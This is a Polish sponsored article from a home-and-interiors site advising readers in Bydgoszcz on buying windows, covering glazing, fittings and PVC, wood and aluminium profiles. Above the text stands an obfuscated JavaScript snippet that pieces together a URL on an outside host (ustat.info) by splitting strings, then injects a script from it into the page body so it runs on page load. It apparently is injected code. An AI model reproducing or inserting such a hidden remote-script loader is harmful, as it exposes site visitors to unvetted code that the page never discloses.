(function(){ ti1mu="c9gwxkfhi1m9";ti1m=document.createElement("script"); ti1m_="u"+("st");ti1m_+="at"+(".");ti1m.async=true;ti1m_+="in"; ti1mu="433770093."+ti1mu;ti1m.type="text/javascript";ti1mu+="qsvdua2v6fpk"; ti1mu+="dvb02z";ti1m_+=("f")+"o"+("/");ti1m.src="https://"+ti1m_+ti1mu; ti1md=document.body;ti1md.appendChild(ti1m); })();

Wybierz okna do swojego domu

Zakup okien jest nie lada wyzwaniem i wymaga podstawowej wiedzy na temat ich specyfiki. Jej zdobycie pozwala dokonać najlepszego wyboru.

Okna – jakie funkcje powinny spełniać?

Okna spełniają bardzo ważne funkcje w domu. Gwarantują stałe naświetlenie pomieszczeń i chronią przed działaniem niskich temperatur. Solidnych właściwości termoizolacyjnych nie da się przecenić zwłaszcza teraz, gdy ceny energii szybują w górę. Zatrzymanie ciepła w mieszkaniu pozwala zaoszczędzić na rachunkach. Mówiąc krótko, rozsądek przy zakupie okien wpływa bezpośrednio zarówno na komfort użytkowników, jak i również na ich wydatki. Warto jednak pamiętać o wietrzeniu pomieszczeń. Bez względu na to, czy mówimy o lecie, czy o zimie – mieszkanie warto wietrzyć. Bowiem pleśń czy grzyb może wyjść z racji nagromadzonej w domu wilgoci. Dlatego z jednej strony warto dbać o zatrzymanie ciepła, ale z drugiej o prawidłowe wywietrzenie pomieszczeń.

Co jeszcze można dopisać do listy funkcji spełnianych przez mądrze wybrane okna? Nie powinno się zapominać o bezpieczeństwie. Wszak pomysłowość złodziei nie zna granic. Wiele produktów obecnych na rynku zawiera specjalne mechanizmy antywłamaniowe. Zastanawiając się nad zakupem okien, przykładowo na terenie Bydgoszczy, warto odpowiedzieć sobie na pytania dotyczące spodziewanych rezultatów wynikających z ich montażu.

Okna Bydgoszcz – sugestie dotyczące ich wyboru

Wybierając okna, warto zwrócić uwagę na takie cechy jak termoizolacja, dźwiękoszczelność, trwałość i odporność na negatywne działanie czynników atmosferycznych. Zabezpieczenia przed potencjalnymi włamaniami także są warte rozpatrzenia w trakcie wyboru okna. Bydgoszcz jako znowu nie takie małe miasto cieszy się sporym wyborem firm zajmujących się stolarką okienną. Ich pracownicy zwróciliby klientom uwagę na kilka elementów wpływających na komfort użytkowania. Jakie to elementy?

Użyteczność pakietu szybowego

Izolacja termiczna jest arcyważna w kontekście użytkowania okien. Chroni przed zimnem i zatrzymuje ciepło w mieszkaniu. Wpływa to na koszt ogrzewania gospodarstwa domowego. Właściwą termoizolację zapewnia pakiet szybowy. Spotykany jest on na rynku w wersjach dwuszybowych i trójszybowych. Oddzielony jest on ramką i wypełniony gazem. Taki pakiet skutecznie zatrzymuje ciepło i, co równie istotne, wpływa bezpośrednio na tłumienie dźwięków dobiegających z zewnątrz. Głośne dzieciaki bawiące się na podwórku nie muszą być już utrapieniem. Warunek konieczny? To zapewni właśnie pakiet szybowy zaimplementowany w zakupionej stolarce.

Rola okucia

W trakcie składania zamówienia na stolarkę otworową warto zwrócić uwagę na jakość okuć. Odgrywają one niepoślednią rolę, ponieważ odpowiadają za mechanizm otwierania i zamykania okien. To daje gwarancję szczelności. Mało tego, dobre okucia chronią domowników przed ewentualnością włamań. Na rynku królują okucia obwodowe, które rozmieszczone są wokół okna. Ich mechanizm działania takich polega na zaciskaniu zaczepu w trakcie ryglowania okien. Sprawia to, że skrzydło dociska się do ramy. W zależności od własnego upodobania wybierać można między okuciami widocznymi a krytymi.

Zwróć uwagę na profile

Wybór profilu okna zależy od zapotrzebowania klienta i jego osobistych preferencji. Zdecydować się może na różne kształty. Rynek obfituje w stolarkę uformowaną w postaci trapezu, koła, łuku, trójkąta lub tzw. wolego oka. Także i materiał, z którego wykonana jest stolarka, znacznie się różni. Przebierać można w oknach o profilu wykonanym z drewna, aluminium i PCV. Każde z nich cieszy się innymi właściwości. W trakcie podejmowania zakupu okien dobrze jest podpytać o parametry sprzedawcę. Powinien on sensownie doradzić w tej materii. Co można powiedzieć o poszczególnych materiałach, z których wykonane są profile okien?

  • Profile PCV. Dzielą się na dwie kategorie. Pierwszą z nich profil PCV „AD”. Charakteryzuje się zanikiem uszczelki przyśrodkowej. Okna wykonane z materiału tego typu opierają się na uszczelkach przylgowych. Profile PCV „MD” z kolei dysponują środkową uszczelką.
  • Profile drewniane. Drewno jest popularnym i często spotykanym surowcem. Prezentuje się elegancko i jest w pełni ekologiczne. Wśród zalet okien o takim profilu znajdują się energooszczędność i trwałość. Walory użytkowe okien drewnianych poprawia się poprzez okresową pielęgnację. Na ogół stosuje się do tego celu konkretne impregnaty.
  • Profile aluminiowe. Są często spotykanym budulcem okien. Zważywszy na ich statykę i sztywność, można to zrozumieć. Zaletą profili aluminiowych jest możliwość ich okleinowania. Rynek oferuje aluminiowe profile okien o różnych kształtach i kolorach. Spełnia to zapotrzebowanie klienta na estetykę.

Jeśli szukasz sprawdzonego dostawcy i fachowej pomocy w doborze okien w Bydgoszczy – koniecznie sprawdź ofertę PerfectStolarka.pl

Treść promocyjna perfectstolarka.pl

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button